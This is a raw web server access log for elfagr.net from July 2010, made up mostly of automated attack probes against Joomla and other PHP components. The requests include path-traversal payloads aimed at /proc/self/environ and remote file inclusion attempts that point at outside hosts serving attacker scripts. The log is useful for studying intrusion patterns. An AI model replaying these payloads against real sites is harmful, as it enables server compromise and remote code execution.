65.254.36.102 - - [01/Jul/2010:09:02:56 -0700] "GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
174.136.55.175 - - [01/Jul/2010:09:03:05 -0700] "GET /logs/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.elfagr.net"
174.136.55.175 - - [01/Jul/2010:09:03:06 -0700] "GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.elfagr.net"
195.205.252.4 - - [01/Jul/2010:09:09:57 -0700] "GET /bbs/skin/zero_vote/login.php?dir=http://www.soundlayers.com/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
69.70.153.210 - - [01/Jul/2010:09:12:56 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.elfagr.net"
194.54.88.43 - - [01/Jul/2010:09:13:33 -0700] "GET /logs/index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.elfagr.net"
194.54.88.43 - - [01/Jul/2010:09:13:33 -0700] "GET /index.php?option=com_mambowiki&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.822" "www.elfagr.net"
67.195.111.171 - - [01/Jul/2010:09:22:37 -0700] "GET /logs/ HTTP/1.0" 200 4783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
222.236.47.182 - - [01/Jul/2010:09:23:09 -0700] "GET /logs//popup_window.php?site_isp_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [01/Jul/2010:09:23:10 -0700] "GET /popup_window.php?site_isp_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [01/Jul/2010:09:23:24 -0700] "GET /logs//popup_window.php?site_isp_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [01/Jul/2010:09:23:35 -0700] "GET /popup_window.php?site_isp_root=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
65.254.36.102 - - [01/Jul/2010:09:26:36 -0700] "GET /logs/access.log/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
65.254.36.102 - - [01/Jul/2010:09:26:37 -0700] "GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
65.254.36.102 - - [01/Jul/2010:09:26:37 -0700] "GET /logs/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
69.70.153.210 - - [01/Jul/2010:09:30:00 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.elfagr.net"
69.70.153.210 - - [01/Jul/2010:09:29:55 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.elfagr.net"
67.195.111.171 - - [01/Jul/2010:09:31:07 -0700] "GET /logs/access_100415.log HTTP/1.0" 200 513471 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
69.70.153.210 - - [01/Jul/2010:09:40:05 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.elfagr.net"
83.16.100.218 - - [01/Jul/2010:09:43:04 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [01/Jul/2010:09:43:04 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [01/Jul/2010:09:43:04 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
83.16.100.218 - - [01/Jul/2010:09:43:32 -0700] "GET /logs/access_100225.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.opensourceuniverse.com/smartoptimizer/a?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
216.129.119.41 - - [01/Jul/2010:09:55:12 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
67.218.116.170 - - [01/Jul/2010:09:59:25 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
67.218.116.164 - - [01/Jul/2010:10:30:32 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
67.218.116.162 - - [01/Jul/2010:10:31:36 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:33:38 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:33:51 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:34:51 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:34:56 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:37:05 -0700] "GET /logs/access.log/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:37:05 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:36:55 -0700] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:36:58 -0700] "GET /logs/access.log/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:36:58 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:37:08 -0700] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:38:01 -0700] "GET /logs/access.log/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:38:01 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:38:01 -0700] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:38:04 -0700] "GET /logs/access.log/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:38:14 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
174.121.9.99 - - [01/Jul/2010:10:38:04 -0700] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
85.17.199.105 - - [01/Jul/2010:10:42:24 -0700] "GET /logs/?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.831" "www.elfagr.net"
85.17.199.105 - - [01/Jul/2010:10:42:35 -0700] "GET /?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "libwww-perl/5.831" "www.elfagr.net"
67.195.111.171 - - [01/Jul/2010:10:52:47 -0700] "GET /logs/access_100527.log HTTP/1.0" 200 2166177 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
216.131.96.193 - - [01/Jul/2010:11:10:29 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
62.182.63.49 - - [01/Jul/2010:11:11:26 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
62.182.63.49 - - [01/Jul/2010:11:11:26 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
216.131.96.193 - - [01/Jul/2010:11:11:47 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
81.93.240.134 - - [01/Jul/2010:11:15:41 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.93.240.134 - - [01/Jul/2010:11:15:41 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
66.249.65.53 - - [01/Jul/2010:11:22:55 -0700] "GET /index_files/image318.gif HTTP/1.1" 200 1153 "-" "Googlebot-Image/1.0" "www.elfagr.net"
66.249.65.53 - - [01/Jul/2010:11:22:57 -0700] "GET /index_files/image468.gif HTTP/1.1" 200 97 "-" "Googlebot-Image/1.0" "www.elfagr.net"
110.138.178.17 - - [01/Jul/2010:11:28:36 -0700] "GET /logs/access_100520.log HTTP/1.0" 200 1245184 "http://www.facebook.com/l.php?u=http%3A%2F%2Fwww.elfagr.net%2Flogs%2Faccess_100520.log&h=977d3ueJK5uupt29kngiAdhMVrw" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6" "www.elfagr.net"
216.131.96.193 - - [01/Jul/2010:11:31:00 -0700] "GET /logs/access_091022.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
216.131.96.193 - - [01/Jul/2010:11:30:50 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
216.131.96.193 - - [01/Jul/2010:11:31:00 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
216.131.96.193 - - [01/Jul/2010:11:31:04 -0700] "GET /logs/access_091022.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
216.131.96.193 - - [01/Jul/2010:11:31:04 -0700] "GET /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
216.131.96.193 - - [01/Jul/2010:11:31:15 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://dongriver.com/~rain/cc/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
210.114.225.88 - - [01/Jul/2010:11:33:21 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
210.114.225.88 - - [01/Jul/2010:11:33:32 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
210.114.225.88 - - [01/Jul/2010:11:33:33 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
210.114.225.88 - - [01/Jul/2010:11:33:34 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
210.114.225.88 - - [01/Jul/2010:11:33:24 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
210.114.225.88 - - [01/Jul/2010:11:33:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)" "www.elfagr.net"
187.60.32.14 - - [01/Jul/2010:11:36:04 -0700] "GET /logs/access_100107.log HTTP/1.0" 200 556338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.elfagr.net"
62.182.63.49 - - [01/Jul/2010:11:39:19 -0700] "GET /logs/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
62.182.63.49 - - [01/Jul/2010:11:39:19 -0700] "GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
207.46.199.184 - - [01/Jul/2010:11:43:05 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "elfagr.net"
81.93.240.134 - - [01/Jul/2010:11:46:49 -0700] "GET /logs/access_091126.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.93.240.134 - - [01/Jul/2010:11:47:00 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.93.240.134 - - [01/Jul/2010:11:46:49 -0700] "GET /logs/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
81.93.240.134 - - [01/Jul/2010:11:47:10 -0700] "GET /logs/access_091203.log/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.195.111.171 - - [01/Jul/2010:12:35:29 -0700] "GET /?S=A HTTP/1.0" 200 1449 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:12:37:57 -0700] "GET /logs/access.log//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:12:37:58 -0700] "GET /index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:12:37:58 -0700] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:12:37:58 -0700] "GET /logs/access.log//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:12:37:58 -0700] "GET /index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:12:38:09 -0700] "GET /logs//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:12:40:25 -0700] "GET /logs/access_091203.log//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:12:40:36 -0700] "GET /logs/access_091203.log//index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
67.30.129.57 - - [01/Jul/2010:12:56:35 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://juh.fileave.com/id1.txt? HTTP/1.1" 200 1466 "-" "Mozilla/5.0" "www.elfagr.net"
67.30.129.57 - - [01/Jul/2010:12:56:35 -0700] "GET /logs/access_091119.log////?_SERVER[DOCUMENT_ROOT]=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.30.129.57 - - [01/Jul/2010:12:56:46 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://juh.fileave.com/id1.txt? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.elfagr.net"
222.236.47.182 - - [01/Jul/2010:13:00:02 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4806 "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [01/Jul/2010:13:00:03 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1466 "-" "libwww-perl/5.79" "www.elfagr.net"
67.30.129.57 - - [01/Jul/2010:13:01:40 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://juh.fileave.com/id1.txt? HTTP/1.1" 200 1466 "-" "Mozilla/5.0" "www.elfagr.net"
67.30.129.57 - - [01/Jul/2010:13:01:30 -0700] "GET /logs/access_091119.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.30.129.57 - - [01/Jul/2010:13:01:30 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://juh.fileave.com/id1.txt? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.elfagr.net"
67.30.129.57 - - [01/Jul/2010:13:01:35 -0700] "GET /logs/access_091015.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.30.129.57 - - [01/Jul/2010:13:02:10 -0700] "GET /logs/access_091119.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.30.129.57 - - [01/Jul/2010:13:02:10 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://juh.fileave.com/id1.txt? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.elfagr.net"
67.30.129.57 - - [01/Jul/2010:13:02:10 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://juh.fileave.com/id1.txt? HTTP/1.1" 200 1466 "-" "Mozilla/5.0" "www.elfagr.net"
67.30.129.57 - - [01/Jul/2010:13:02:14 -0700] "GET /logs/access_091015.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://juh.fileave.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:13:10:50 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
222.236.47.182 - - [01/Jul/2010:13:12:35 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1466 "-" "libwww-perl/5.79" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:13:14:59 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:13:15:09 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:13:14:59 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:13:16:11 -0700] "GET /logs/access.log/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:13:16:01 -0700] "GET /index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
68.232.180.132 - - [01/Jul/2010:13:16:12 -0700] "GET /logs/index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.elfagr.net"
62.149.14.44 - - [01/Jul/2010:13:19:24 -0700] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.elfagr.net"
62.149.14.44 - - [01/Jul/2010:13:19:14 -0700] "GET /index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://server4.fileave.com/respon.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.elfagr.net"
89.185.231.103 - - [01/Jul/2010:13:28:30 -0700] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
89.185.231.103 - - [01/Jul/2010:13:28:19 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
89.185.231.103 - - [01/Jul/2010:13:28:19 -0700] "GET /logs/access_100218.log//modules/4nAlbum/public/displayCategory.php?basepath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
89.185.231.103 - - [01/Jul/2010:13:28:35 -0700] "GET /logs/access_091217.log//modules/4nAlbum/public/displayCategory.php?basepath=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
89.185.231.103 - - [01/Jul/2010:13:32:18 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
89.185.231.103 - - [01/Jul/2010:13:32:18 -0700] "GET /logs/access_100107.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
89.185.231.103 - - [01/Jul/2010:13:32:18 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
89.185.231.103 - - [01/Jul/2010:13:32:22 -0700] "GET /logs/access_100218.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:13:34:36 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:13:34:36 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:13:34:49 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:13:34:51 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
62.149.14.44 - - [01/Jul/2010:13:37:23 -0700] "GET /logs/index.php?option=com_mambatstaff&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.elfagr.net"
62.149.14.44 - - [01/Jul/2010:13:37:24 -0700] "GET /index.php?option=com_mambatstaff&Itemid=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:13:46:23 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:13:46:37 -0700] "GET /logs/access.log//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
